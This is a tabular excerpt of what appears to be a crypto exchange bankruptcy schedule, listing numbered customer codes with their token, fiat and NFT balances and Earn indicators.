| 07374383 | | TRX[1], USD[0.61] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374384 | | ALGO[0], BAT[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0.00000013], ETHW[0.00000013], GBP[0.00], GRT[0], LINK[0], LTC[0], MATIC[0], NEAR[0], SGD[0.00], SHIB[2], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00003670] | Yes | |
| 07374385 | | CUSDT[3724.4310979], DOGE[3185.07969474], TRX[1888.465829], USD[0.01] | | |
| 07374386 | | BCH[0], DOGE[1.80215244], USD[0.00] | | |
| 07374387 | | USD[10.00] | | |
| 07374388 | | BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], GRT[0], NFT (422852335941668704/African Violets 1)[1], PAXG[0], SOL[0], TRX[45.95400000], USD[20.08], USDT[0], WBTC[0] | | |
| 07374389 | | USD[10.00] | | |
| 07374390 | | DOGE[479.82706522], GRT[5.7392339], USD[0.00] | | |
| 07374391 | | BAT[1.0165555], BRZ[1], BTC[.00184541], CUSDT[5], DOGE[1], SHIB[7924234.99577357], TRX[5], USD[0.00] | Yes | |
| 07374392 | | USD[10.00] | | |
| 07374393 | | USD[10.00] | | |
| 07374394 | | USD[10.00] | | |
| 07374395 | | USD[10.00] | | |
| 07374396 | | BRZ[1], CUSDT[1], DOGE[10408.92200242], USD[0.00] | | |
| 07374397 | | BRZ[0.81801000], DOGE[1], USD[0.00] | Yes | |
| 07374398 | | USD[10.00] | | |
| 07374399 | | USD[0.00] | | |
| 07374400 | | USD[10.00] | | |
| 07374401 | | BCH[0], BRZ[0], CUSDT[2], DOGE[0], TRX[1], USD[0.00] | | |
| 07374402 | | BRZ[4], BTC[.00002832], CUSDT[12.97869317], DOGE[57.0432389], ETH[.00169175], ETHW[.02599821], PAXG[.00049102], SHIB[92344.92377659], TRX[6], USD[1010.52] | | |
| 07374403 | | USD[10.00] | | |
| 07374405 | | USD[0.00] | | |
| 07374406 | | CUSDT[5], DOGE[2], ETH[.07837863], ETHW[.07740687], SHIB[1017005.07081677], USD[0.00] | Yes | |
| 07374407 | | DOGE[.8959], USD[0.81] | | |
| 07374408 | | BAT[1], BRZ[1], CUSDT[9], DOGE[4], SHIB[1], TRX[6], USD[0.01] | Yes | |
| 07374409 | | USD[10.00] | | |
| 07374410 | | USD[10.00] | | |
| 07374411 | | USD[10.19] | Yes | |
| 07374412 | | CUSDT[1], DOGE[148.42760807], TRX[64.84673441], USD[24.98] | | |
| 07374413 | | CUSDT[1], DOGE[249.10418709], USD[0.00] | Yes | |
| 07374414 | | CUSDT[2], DOGE[43.17421043], USD[0.01] | | |
| 07374415 | | CUSDT[1], DOGE[39.35862636], USD[0.00] | | |
| 07374416 | | SHIB[37457.06861964], USD[0.00], USDT[0] | Yes | |
| 07374417 | | USD[10.00] | | |
| 07374421 | | BRZ[1], CUSDT[1], USD[0.54] | | |
| 07374422 | | CUSDT[2], TRX[1], USD[0.01], USDT[1.08963673] | Yes | |
| 07374423 | | USD[0.00] | | |
| 07374425 | | BAT[66.87101581], BRZ[1], CUSDT[1], DOGE[2], GRT[160.5915271], TRX[779.46989516], USD[0.00] | Yes | |
| 07374427 | | USD[7.72] | | |
| 07374428 | | USD[10.00] | | |
| 07374429 | | DOGE[504.71080613], TRX[1], USD[0.00] | Yes | |
| 07374430 | | BTC[0], TRX[1], USD[0.00] | Yes | |
| 07374431 | | BAT[777.42972086], BTC[0], DOGE[998.26387228], ETH[0.41976337], ETHW[0.41958719], SHIB[89207.82816401], SOL[0], TRX[973.55643792], USD[0.00], USDT[0] | Yes | |
| 07374432 | | USD[10.00] | | |
| 07374433 | | USD[10.00] | | |
| 07374434 | | USD[10.00] | | |
| 07374435 | | USD[10.00] | | |
| 07374436 | | USD[10.00] | | |
| 07374437 | | USD[10.00] | | |
| 07374438 | | USD[10.00] | | |
| 07374439 | | USD[10.00] | | |
| 07374440 | | BAT[8.36761265], DOGE[605.32290504], USD[0.00] | | |
| 07374441 | | BTC[0.00000003], DOGE[165.61351929], LTC[0], SHIB[1], USD[0.00] | Yes | |
| 07374442 | | BAT[1], DOGE[11169.53991621], TRX[1], USD[-90.00] | | |
| 07374443 | | USD[10.00] | | |
| 07374444 | | ETH[.00562681], ETHW[.00562681], TRX[1], USD[0.00] | | |
| 07374445 | | USD[10.00] | | |
| 07374447 | | CUSDT[2], DOGE[.92040595], USD[0.00] | | |
| 07374448 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374449 | | USD[10.00] | | |
| 07374450 | | BTC[.00021263], CUSDT[1], DOGE[5001.77593896], ETH[.00525254], ETHW[.00525254], TRX[1], USD[0.22] | | |
| 07374451 | | USD[10.00] | | |
| 07374452 | | USD[10.00] | | |
| 07374453 | | USD[10.00] | | |
| 07374454 | | USD[20.00] | | |
| 07374455 | | USD[0.00] | | |
| 07374457 | | USD[10.00] | | |
| 07374458 | | USD[0.00] | | |
| 07374459 | | BRZ[1], CUSDT[2], DOGE[14059.9499141], USD[1.00] | | |
| 07374460 | | CUSDT[1], USD[0.01] | | |
| 07374461 | | USD[0.01] | | |
| 07374462 | | DOGE[116.30827016], USD[0.33] | | |
| 07374463 | | USD[10.00] | | |
| 07374464 | | DOGE[138.53427961], USD[0.00] | | |
| 07374466 | | BAT[0.00003547], BRZ[2], BTC[0.00435616], CUSDT[4.00165436], DOGE[1], ETH[0.01453493], ETHW[0.01435709], MATIC[121.43139317], SHIB[3201797.80391695], SOL[0.77893299], SUSHI[38.66872812], TRX[0], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07374467 | | BTC[.0003709], CUSDT[3], DOGE[4541.96465874], ETH[.01030847], ETHW[.01018535], KSHIB[224.58359394], SHIB[243478.72543438], TRX[2], USD[0.00] | Yes | |
| 07374468 | | CUSDT[3], DOGE[5663.90959546], TRX[1], USD[299.99] | | |
| 07374469 | | CUSDT[2], DOGE[32.51467019], TRX[22804.38657429], USD[0.00] | Yes | |
| 07374470 | | BTC[0], DOGE[119.99997958], ETH[0.00095471], ETHW[0.00095471], GRT[0], TRX[0], USD[0.00] | | |
| 07374471 | | CUSDT[2], USD[0.01] | | |
| 07374472 | | USD[10.00] | | |
| 07374473 | | BRZ[1], BTC[.00021404], DOGE[42.49354171], TRX[2], USD[0.67] | | |
| 07374474 | | USD[79.71] | | |
| 07374475 | | USD[10.00] | | |
| 07374476 | | SHIB[1], TRX[3], USD[0.01] | Yes | |
| 07374477 | | DOGE[1], USD[0.00] | | |
| 07374479 | | CUSDT[94.65624132], TRX[1], USD[0.00] | | |
| 07374480 | | USD[10.00] | | |
| 07374481 | | TRX[1], USD[0.89] | | |
| 07374482 | | USD[10.00] | | |
| 07374483 | | USD[10.00] | | |
| 07374485 | | AAVE[.15014437], AVAX[.1137914], BCH[.08514405], BTC[.01051665], DOGE[534.69245739], ETH[.03457422], ETHW[.03414759], GRT[17.5570184], LINK[1.21074746], LTC[.04955721], NFT [338019930675053864/FTX - Off The Grid Miami #4146][1], SHIB[349469.04986393], SOL[2.907066], TRX[561.71780317], USD[0.00], USDT[0] | Yes | |
| 07374486 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], USD[0.00] | | |
| 07374487 | | USD[10.00] | | |
| 07374488 | | USD[10.00] | | |
| 07374490 | | DOGE[1], USD[10.53] | | |
| 07374492 | | USD[10.00] | | |
| 07374493 | | DOGE[.00393815], TRX[32.5560557], USD[0.00] | | |
| 07374494 | | BTC[0], USD[0.19] | | |
| 07374496 | | USD[10.00] | | |
| 07374497 | | USD[10.00] | | |
| 07374498 | | USD[10.00] | | |
| 07374500 | | DOGE[.0234], USD[0.01] | | |
| 07374501 | | BRZ[1], CUSDT[2], GRT[2], LINK[1], TRX[4], USD[6441.50], USDT[2] | | |
| 07374502 | | DOGE[34.06021928], USD[0.00] | | |
| 07374503 | | TRX[214.63229945], USD[0.00] | | |
| 07374504 | | USD[10.00] | | |
| 07374506 | | CUSDT[1], USD[0.00] | | |
| 07374507 | | USD[0.50] | Yes | |
| 07374508 | | USD[10.00] | | |
| 07374509 | | BTC[0.00029920], DOGE[0], SUSHI[0], USD[4.96] | | |
| 07374510 | | BAT[0], BTC[0.00000003], DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07374511 | | BTC[0], CUSDT[2], DOGE[1], ETH[.0000001], ETHW[0], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07374512 | | BTC[0], CUSDT[.95731], DOGE[47.45720867], TRX[1], USD[0.00] | | |
| 07374513 | | DAI[4.37204515], SUSHI[.31621401], USD[0.00] | | |
| 07374514 | | USD[10.00] | | |
| 07374515 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374516 | | BAT[1.0165555], BRZ[2], CUSDT[7], DOGE[7.11052526], ETH[0], GRT[1.00367791], SHIB[3], SOL[0.00055900], TRX[7], USD[0.01], USDT[2.11780861] | Yes | |
| 07374517 | | BAT[1], DOGE[.13257212], USD[0.00] | | |
| 07374518 | | USD[10.00] | | |
| 07374519 | | USD[0.24] | | |
| 07374520 | | USD[10.00] | | |
| 07374521 | | USD[0.00] | Yes | |
| 07374522 | | USD[0.26], USDT[0] | | |
| 07374523 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07374524 | | BAT[2.11016378], BRZ[3], CUSDT[30], DAI[0], DOGE[1.53129217], TRX[8.00087675], USD[0.00], USDT[0] | Yes | |
| 07374525 | | USD[10.00] | | |
| 07374526 | | BTC[0], UNI[0] | | |
| 07374527 | | USD[10.00] | | |
| 07374528 | | BTC[0], ETHW[.45856395], USD[0.58] | | |
| 07374529 | | USD[10.00] | | |
| 07374530 | | CUSDT[1], DOGE[.00033773], USD[0.00] | | |
| 07374531 | | USD[15.00] | | |
| 07374532 | | USD[10.00] | | |
| 07374533 | | BAT[1], BRZ[1], CUSDT[5], DOGE[3382.96178674], ETH[2.02152234], ETHW[2.02152234], TRX[2], USD[0.00] | | |
| 07374534 | | DOGE[1], USD[0.01] | | |
| 07374535 | | USD[10.00] | | |
| 07374536 | | DOGE[139.15767025], SHIB[60695.26212503], TRX[47.90438438], USD[5.00] | | |
| 07374537 | | TRX[210.91373101], USD[0.00] | | |
| 07374538 | | BRZ[121.86496439], BTC[.0257928], CUSDT[14], DOGE[875.65003904], ETH[.82261909], ETHW[.82227363], SOL[.02233966], TRX[6], USD[0.00] | Yes | |
| 07374539 | | BRZ[1], CUSDT[1], DOGE[1031.08100401], TRX[85.82503163], USD[0.00] | Yes | |
| 07374540 | | USD[10.00] | | |
| 07374541 | | CUSDT[1], DOGE[180.82817058], GRT[10.40165331], LINK[2.09026679], LTC[.31477058], SHIB[10818.12035158], UNI[2.24062046], USD[0.02], USDT[9.94407343] | | |
| 07374542 | | CUSDT[1], DOGE[1457.2060413], USD[0.07] | | |
| 07374543 | | BRZ[1], CUSDT[2], SOL[.00030127], USD[0.00], USDT[0.00000317] | | |
| 07374544 | | USD[10.00] | | |
| 07374545 | | CUSDT[2], DOGE[0], LINK[0], USD[0.00], YFI[0] | | |
| 07374546 | | CUSDT[1], MATIC[11.18581873], USD[5.38] | Yes | |
| 07374547 | | BTC[0], DOGE[0], ETH[0], ETHW[1.41109955], MATIC[0], NFT (52231255229338719/Magic Eden Prime)[1], SHIB[1], SOL[0], USD[193.27], USDT[0.00000044] | Yes | |
| 07374548 | | USD[10.00] | | |
| 07374550 | | USD[10.00] | | |
| 07374551 | | USD[10.00] | | |
| 07374552 | | BRZ[1], CUSDT[5], DOGE[2], SOL[.00003729], TRX[6144.94776352], USD[40.95] | | |
| 07374553 | | CUSDT[1], DOGE[49.84660635], USD[0.00] | | |
| 07374554 | | USD[110.00] | | |
| 07374555 | | USD[10.00] | | |
| 07374556 | | ETH[0] | | |
| 07374557 | | USD[10.00] | | |
| 07374558 | | USD[10.00] | | |
| 07374560 | | DOGE[136.73033469], TRX[1], USD[0.00] | | |
| 07374561 | | CUSDT[3], DOGE[43.93659861], ETH[0.00833684], ETHW[0.00822740], LTC[.0442222], USD[0.00] | Yes | |
| 07374562 | | USD[10.00] | | |
| 07374563 | | USD[10.00] | | |
| 07374564 | | BRZ[1], CUSDT[2], TRX[7178.98144242], USD[0.00] | | |
| 07374565 | | USD[10.00] | | |
| 07374566 | | CUSDT[1], DOGE[2.71070792], ETH[.08309932], ETHW[.08309932], SHIB[726534.9845975], TRX[1], USD[14.39] | | |
| 07374567 | | USD[10.00] | | |
| 07374568 | | USD[10.00] | | |
| 07374569 | | CUSDT[1], USD[0.01] | | |
| 07374570 | | BTC[.00017867], USD[0.00] | | |
| 07374571 | | CUSDT[1], USD[0.01] | | |
| 07374572 | | DOGE[.00001273], TRX[1], USD[57.05] | | |
| 07374573 | | DOGE[1], ETH[.00465652], ETHW[.00465652], USD[0.00] | | |
| 07374575 | | USD[10.00] | | |
| 07374576 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374577 | | USD[10.00] | | |
| 07374578 | | DOGE[0], GRT[0], USD[0.00] | | |
| 07374579 | | DOGE[121.37498437], USD[0.00] | | |
| 07374580 | | DOGE[16.09668285], USD[0.00] | | |
| 07374581 | | BTC[0.00019157], CUSDT[1], USD[0.00], YFI[0] | | |
| 07374582 | | GRT[1], TRX[69.68244137], USD[0.00], USDT[7.60399063] | | |
| 07374583 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07374584 | | BRZ[2], CUSDT[5], GRT[1], TRX[3], USD[0.01] | | |
| 07374586 | | BRZ[4], BTC[0], CUSDT[5], DOGE[5554.82112441], GRT[2], TRX[3], USD[0.00] | | |
| 07374588 | | BAT[3.97252886], BRZ[3], BTC[.01004509], CUSDT[128.49854885], DOGE[2211.82959136], ETH[.11151269], ETHW[0.11040715], GRT[33.9494118], SHIB[1], TRX[2], USD[1251.82] | Yes | |
| 07374589 | | USD[10.00] | | |
| 07374590 | | DOGE[1.74449043], USD[0.00] | Yes | |
| 07374591 | | CUSDT[1], TRX[3], USD[0.00] | | |
| 07374592 | | USD[10.00] | | |
| 07374593 | | BRZ[1], BTC[0], CUSDT[4], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07374594 | | CUSDT[4], DOGE[.48560813], TRX[1], USD[0.00] | | |
| 07374596 | | DOGE[892.65484536], USD[0.00] | Yes | |
| 07374597 | | USD[10.00] | | |
| 07374598 | | BTC[.0000859], DOGE[2], ETH[.00147737], ETHW[.00147737], USD[0.01] | | |
| 07374600 | | USD[10.00] | | |
| 07374601 | | USD[10.00] | | |
| 07374602 | | USD[10.00] | | |
| 07374603 | | BRZ[2], CUSDT[2], SHIB[986517.59289707], USD[0.31] | | |
| 07374604 | | CUSDT[1.00075798], DOGE[1], ETH[.00142503], ETHW[.00141135], SHIB[6], TRX[.00023555], USD[0.00] | Yes | |
| 07374605 | | USD[10.00] | | |
| 07374606 | | USD[10.00] | | |
| 07374607 | | USD[10.00] | | |
| 07374608 | | USD[10.00] | | |
| 07374609 | | CUSDT[421.44803693], USD[0.00] | | |
| 07374610 | | BRZ[1], BTC[.00697284], CUSDT[6], DOGE[3298.94649911], ETH[.61805897], ETHW[.61779953], TRX[2077.15129597], USD[102.46] | Yes | |
| 07374611 | | CUSDT[1], DOGE[485.78717189], USD[0.00] | Yes | |
| 07374613 | | BTC[.00023216], USD[0.00] | | |
| 07374614 | | DOGE[100457.38138498], GRT[1], USD[0.00], USDT[0] | | |
| 07374615 | | USD[10.00] | | |
| 07374616 | | DOGE[115.92568217], TRX[154.25733254], USD[0.00] | Yes | |
| 07374617 | | BRZ[0], KSHIB[0], SHIB[4427.37267370], USD[0.00] | Yes | |
| 07374618 | | USD[10.00] | | |
| 07374619 | | USD[0.19] | | |
| 07374620 | | BAT[1], CUSDT[2], GRT[3], USD[0.00] | | |
| 07374621 | | BRZ[0], DOGE[0], ETH[0], TRX[2], USD[0.00] | Yes | |
| 07374622 | | SUSHI[0] | | |
| 07374623 | | BTC[.00142281], CUSDT[1], DOGE[1131.25790874], ETH[.03173851], ETHW[.03134179], TRX[1], USD[0.77] | Yes | |
| 07374625 | | BCH[.00003726], CUSDT[1], DOGE[0], ETH[0], TRX[126.96121150], USD[0.00] | | |
| 07374626 | | BAT[0], BCH[0], BTC[0], DOGE[0], LINK[0], LTC[0], SHIB[3128586.06832519], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[64.53] | Yes | |
| 07374627 | | DOGE[162.15678077], USD[0.00] | | |
| 07374628 | | ETH[.00578842], ETHW[.00572002], USD[0.00] | Yes | |
| 07374629 | | CUSDT[18.39959698], SHIB[1], USD[0.01] | Yes | |
| 07374631 | | DOGE[141.00597611], USD[0.00] | | |
| 07374632 | | CUSDT[1], USD[16.63] | | |
| 07374633 | | CUSDT[2], DOGE[135.14261928], USD[0.97] | | |
| 07374634 | | ALGO[29.35436569], DOGE[790.90726014], USD[0.00] | | |
| 07374636 | | DOGE[135.17077272], USD[0.00] | | |
| 07374637 | | DOGE[6.5320283], USD[0.00], USDT[0] | Yes | |
| 07374638 | | CUSDT[4], DOGE[52.67923455], TRX[2], USD[0.50] | | |
| 07374639 | | DOGE[7656.42497323], TRX[1], USD[10.00] | | |
| 07374640 | | BRZ[2.00363647], CUSDT[10], GRT[1.00473253], TRX[1], USD[0.00] | Yes | |
| 07374641 | | USD[10.00] | | |
| 07374642 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374643 | | DOGE[3], TRX[1], USD[0.00], USDT[1] | | |
| 07374644 | | USD[0.01] | | |
| 07374645 | | BRZ[1], CUSDT[3], GRT[2], TRX[1], USD[0.01] | | |
| 07374646 | | USD[10.00] | | |
| 07374647 | | BCH[.0110393], BTC[.00010048], DOGE[2.00300867], TRX[.0000559], USD[0.00] | | |
| 07374648 | | USD[0.01] | | |
| 07374649 | | BRZ[1], DOGE[4512.55233293], TRX[0], USD[0.00] | | |
| 07374650 | | TRX[1], USD[0.00] | | |
| 07374651 | | DOGE[0], USD[1.47] | | |
| 07374652 | | TRX[85.47316104], USD[0.00] | | |
| 07374653 | | BRZ[1], CUSDT[1], DOGE[6911.53096374], TRX[1], USD[0.00] | | |
| 07374654 | | CUSDT[1], DOGE[521.58591945], USD[15.94] | | |
| 07374655 | | DOGE[15984.0006547], TRX[203.95572541], USD[0.00] | | |
| 07374656 | | BRZ[3.67835672], CUSDT[7.35769378], DOGE[279.87613211], ETH[0], SUSHI[.00004861], USD[0.00] | | |
| 07374657 | | USD[10.00] | | |
| 07374658 | | USD[0.19] | | |
| 07374659 | | CUSDT[7], SHIB[576146.84883569], USD[0.00] | | |
| 07374660 | | USD[10.00] | | |
| 07374661 | | CUSDT[2], DOGE[63.58320978], TRX[1], USD[0.00] | | |
| 07374662 | | CUSDT[3], USD[0.00] | | |
| 07374663 | | USD[10.00] | | |
| 07374664 | | CUSDT[1], DOGE[1400.20863248], TRX[1], USD[0.00] | Yes | |
| 07374665 | | ETH[0.00816052], ETHW[0.00816052], USD[0.00], USDT[0] | | |
| 07374667 | | USD[10.00] | | |
| 07374668 | | BTC[0], ETH[.00000001], USD[0.00] | | |
| 07374669 | | USD[0.00] | | |
| 07374670 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07374671 | | BAT[2], BRZ[4], CUSDT[22], DOGE[4519.57866225], TRX[9], USD[0.00] | | |
| 07374673 | | USD[0.00] | | |
| 07374674 | | BRZ[1], CUSDT[301.54407284], DOGE[.47270856], GRT[.00528618], TRX[2], USD[0.30] | | |
| 07374675 | | USD[0.32], USDT[0] | | |
| 07374676 | | BTC[0], DOGE[0], LINK[0], TRX[0], USD[0.00] | | |
| 07374677 | | USD[10.00] | | |
| 07374678 | | DOGE[1903.65119826], TRX[1], USD[0.00] | | |
| 07374679 | | BTC[.00010891], SOL[.63915212], USD[0.00] | | |
| 07374680 | | BAT[0], BCH[0], BTC[0.00078979], DOGE[0], KSHIB[2.72677227], LINK[0], MATIC[0.00018560], SHIB[174012.63321115], SOL[0], SUSHI[0], UNI[0], USD[0.00] | Yes | |
| 07374681 | | USD[10.00] | | |
| 07374682 | | DOGE[1.00003129], SUSHI[.308603], TRX[3], USD[0.01] | | |
| 07374683 | | CUSDT[2], DOGE[806.36712115], NFT [570197596327573819/Entrance Voucher #2987][1], SHIB[6899939.55921613], TRX[1], USD[0.12] | | |
| 07374684 | | DOGE[25391.09465852], USD[0.00] | Yes | |
| 07374686 | | DOGE[187.06851492], USD[0.00] | Yes | |
| 07374687 | | USD[1.18] | | |
| 07374688 | | CUSDT[1], DOGE[2.61781031], TRX[332.61136958], USD[0.00] | | |
| 07374689 | | BRZ[4], CUSDT[10], DOGE[4], TRX[3], USD[0.00], USDT[2.17835648] | Yes | |
| 07374690 | | USD[10.00] | | |
| 07374691 | | USD[10.00] | | |
| 07374692 | | USD[10.00] | | |
| 07374693 | | DOGE[17.31851208], USD[0.00] | | |
| 07374694 | | ETH[4.0180362], ETHW[4.01634864], LTC[1.4373937], MATIC[84.16282084], SHIB[274705.24729516], TRX[1294.0639026], USD[71.27] | Yes | |
| 07374695 | | USD[10.00] | | |
| 07374696 | | BRZ[5.07952967], ETHW[.36866654], GRT[1.00367791], LTC[0], SHIB[1], USD[0.00] | Yes | |
| 07374697 | | USD[1.70], USDT[0.00000001] | | |
| 07374698 | | BTC[0], ETH[0], LTC[0], SOL[.011], USD[2.85] | | |
| 07374699 | | DOGE[1205.04201721], USD[10.00] | | |
| 07374700 | | CUSDT[1], DOGE[.00697563], TRX[353.71149252], USD[0.00] | | |
| 07374703 | | DOGE[1], GRT[1], USD[0.93] | | |
| 07374704 | | USD[10.00] | | |
| 07374705 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374706 | | USD[0.04] | | |
| 07374707 | | USD[10.00] | | |
| 07374710 | | USD[10.00] | | |
| 07374711 | | BAT[2], BRZ[3], BTC[0.05066828], CUSDT[4], GRT[1], TRX[3], USD[0.00], USDT[1] | | |
| 07374712 | | USD[0.00] | | |
| 07374714 | | BAT[2.13115234], BCH[.51863338], BRZ[1], BTC[.06946963], CUSDT[59.14874473], DAI[45.02852663], DOGE[6342.92709018], ETH[.27466581], ETHW[.27447003], EUR[100.99], GRT[1.00498957], LINK[4.86636154], LTC[.92421428], SHIB[6], SOL[1.47482197], SUSHI[.1470138], TRX[2], USD[0.61], USDT[0], YFI[.01021466] | Yes | |
| 07374715 | | USD[0.00] | | |
| 07374717 | | USD[10.00] | | |
| 07374718 | | USD[0.01] | | |
| 07374719 | | BRZ[1], BTC[.00111294], CUSDT[7], DOGE[3881.57385076], SHIB[1], USD[0.00] | Yes | |
| 07374720 | | CUSDT[1], DOGE[7.94638327], TRX[2], USD[0.00] | | |
| 07374721 | | BAT[1], BRZ[1], CUSDT[1], DOGE[7], GRT[4204.01486908], TRX[1], USD[2500.00], USDT[2753.37157996] | | |
| 07374722 | | BRZ[1], CUSDT[5], DOGE[2498.72054052], USD[0.00] | Yes | |
| 07374723 | | USD[10.00] | | |
| 07374725 | | USD[10.00] | | |
| 07374726 | | USD[10.00] | | |
| 07374728 | | USD[0.18], USDT[0] | Yes | |
| 07374729 | | DOGE[1.00001504], USD[0.00] | | |
| 07374730 | | USD[10.00] | | |
| 07374731 | | BRZ[1], CUSDT[10], DOGE[2841.38282698], TRX[1103.17506425], USD[0.00] | Yes | |
| 07374732 | | USD[10.00] | | |
| 07374733 | | USD[10.00] | | |
| 07374734 | | LINK[0], TRX[1], USD[0.00] | | |
| 07374735 | | DOGE[144.01054387], USD[0.00] | | |
| 07374736 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07374737 | | USD[10.00] | | |
| 07374738 | | SUSHI[30.08976885] | | |
| 07374739 | | CUSDT[1], DOGE[5.04154132], NFT (314763029264389501/FTX - Off The Grid Miami #2280)[1], SOL[9.62973572], TRX[1], USD[0.01] | Yes | |
| 07374740 | | BRZ[1], CUSDT[2], DOGE[292.32047529], ETH[.04329286], ETHW[.04329286], TRX[1], USD[0.00] | | |
| 07374741 | | USD[10.77] | Yes | |
| 07374742 | | USD[0.01] | | |
| 07374744 | | CUSDT[3], USD[0.01] | | |
| 07374745 | | USD[10.00] | | |
| 07374746 | | CUSDT[2], USD[0.01] | Yes | |
| 07374747 | | USD[10.00] | | |
| 07374748 | | USD[10.00] | | |
| 07374749 | | USD[10.00] | | |
| 07374750 | | USD[10.00] | | |
| 07374751 | | USD[10.00] | | |
| 07374752 | | USD[10.00] | | |
| 07374753 | | USD[10.00] | | |
| 07374754 | | USD[10.00] | | |
| 07374755 | | CUSDT[1.20508893], USD[0.00] | | |
| 07374756 | | BTC[.00363855], CUSDT[18], DOGE[1958.3697984], ETH[.00631443], ETHW[.00623235], SHIB[2749286.42845177], SOL[.4976451], TRX[4], USD[0.03] | Yes | |
| 07374757 | | USD[10.00] | | |
| 07374758 | | USD[10.00] | | |
| 07374761 | | DOGE[3667.20057288], USD[0.00] | | |
| 07374762 | | USD[10.00] | | |
| 07374763 | | CUSDT[2], DOGE[12.7306085], GRT[4.56532877], TRX[1], USD[0.33] | | |
| 07374764 | | USD[10.00] | | |
| 07374765 | | DOGE[1.08353894], USD[0.00] | | |
| 07374767 | | CUSDT[4.14120495], DOGE[3998.14581902], EUR[0.00], GBP[0.00], SHIB[1], TRX[.00039657], USD[14.84], USDT[0] | Yes | |
| 07374768 | | USD[10.00] | | |
| 07374769 | | BRZ[1], CUSDT[470.05833256], TRX[76.6441897], UNI[1.09759883], USD[15.00], USDT[19.77280279] | | |
| 07374770 | | ETH[0], ETHW[0], SHIB[2], SOL[0], TRX[0], USD[0.00], USDT[0.00000007] | Yes | |
| 07374771 | | USD[10.00] | | |
| 07374772 | | DOGE[.0069214], TRX[1], USD[0.00] | | |
| 07374773 | | CUSDT[2], DOGE[3], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374774 | | BAT[139.26097701], BTC[.00550609], CUSDT[4], DOGE[2022.46219214], GRT[1.00366089], SOL[210.79068837], TRX[2523.69279718], USD[0.00] | Yes | |
| 07374775 | | DOGE[.07204214], USD[0.00] | Yes | |
| 07374777 | | DOGE[1140.72299317], USD[0.00] | Yes | |
| 07374778 | | USD[10.00] | | |
| 07374780 | | USD[10.00] | | |
| 07374781 | | BRZ[1], DOGE[1706.62501591], USD[510.00] | | |
| 07374783 | | DOGE[0], USD[1.48] | | |
| 07374786 | | USD[10.00] | | |
| 07374787 | | DOGE[0], USD[0.00] | | |
| 07374788 | | BRZ[1], SHIB[1], USD[0.01] | | |
| 07374790 | | USD[0.01] | Yes | |
| 07374791 | | USD[10.82] | Yes | |
| 07374792 | | USD[10.00] | | |
| 07374793 | | CUSDT[1], DOGE[251.78215349], USD[0.00] | Yes | |
| 07374794 | | USD[10.00] | | |
| 07374795 | | USD[0.00] | | |
| 07374796 | | DOGE[.11115392], USD[0.00] | Yes | |
| 07374797 | | CUSDT[3], SHIB[1], USD[0.00] | Yes | |
| 07374798 | | LTC[.00000046], SOL[.08], USD[4.29] | | |
| 07374799 | | DOGE[187.66611632], USD[0.00] | Yes | |
| 07374801 | | BRZ[1], CUSDT[4], DOGE[1.8480941], LINK[1], SUSHI[.00002631], TRX[4], USD[0.18] | | |
| 07374802 | | USD[10.00] | | |
| 07374803 | | CUSDT[1], USD[68.47] | | |
| 07374804 | | USD[10.00] | | |
| 07374806 | | DOGE[1], USD[0.00] | | |
| 07374807 | | BRZ[4], CUSDT[15], DOGE[1222.86899046], TRX[6], USD[97.46] | Yes | |
| 07374809 | | BTC[.00021115], USD[0.00] | | |
| 07374810 | | USD[10.00] | | |
| 07374811 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07374812 | | CUSDT[2], DOGE[3], GRT[1.00367791], LTC[.00005884], SOL[19.14832542], SUSHI[1.09991439], USD[0.00] | Yes | |
| 07374813 | | USD[10.00] | | |
| 07374814 | | USD[10.00] | | |
| 07374815 | | USD[10.00] | | |
| 07374816 | | DOGE[0], USD[0.01] | | |
| 07374817 | | USD[10.00] | | |
| 07374818 | | CUSDT[3], DOGE[9467.92479269], TRX[3], USD[95.96] | | |
| 07374819 | | USD[10.00] | | |
| 07374821 | | USD[10.00] | | |
| 07374822 | | CUSDT[1], DOGE[9], USD[0.00] | | |
| 07374823 | | USD[10.00] | | |
| 07374824 | | BAT[86.31647097], BRZ[1], BTC[.00345198], CUSDT[43], DOGE[15186.94069273], ETH[.21152254], ETHW[.21130638], NFT (34112304813454745525/FTX - Off The Grid Miami #1401)[1], SOL[11.24650044], TRX[164.00245959], UNI[.00010404], USD[0.00], USDT[51.2787398] | Yes | |
| 07374825 | | USD[10.00] | | |
| 07374826 | | USD[10.00] | | |
